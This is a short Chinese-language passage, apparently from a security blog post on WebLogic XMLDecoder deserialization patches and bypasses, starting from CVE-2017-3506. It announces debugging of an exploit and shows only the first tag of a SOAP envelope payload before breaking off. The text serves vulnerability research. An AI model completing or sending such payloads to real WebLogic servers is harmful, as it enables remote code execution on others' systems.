xmldecoder反序列化的补丁与绕过
从cve-2017-3506谈起2017年4月weblogic官方发布了一个补丁http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
官方说这洞主要是web service模块的问题,那我们来动态调试一下exp12345678910111213141516171819202122<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header><wo
...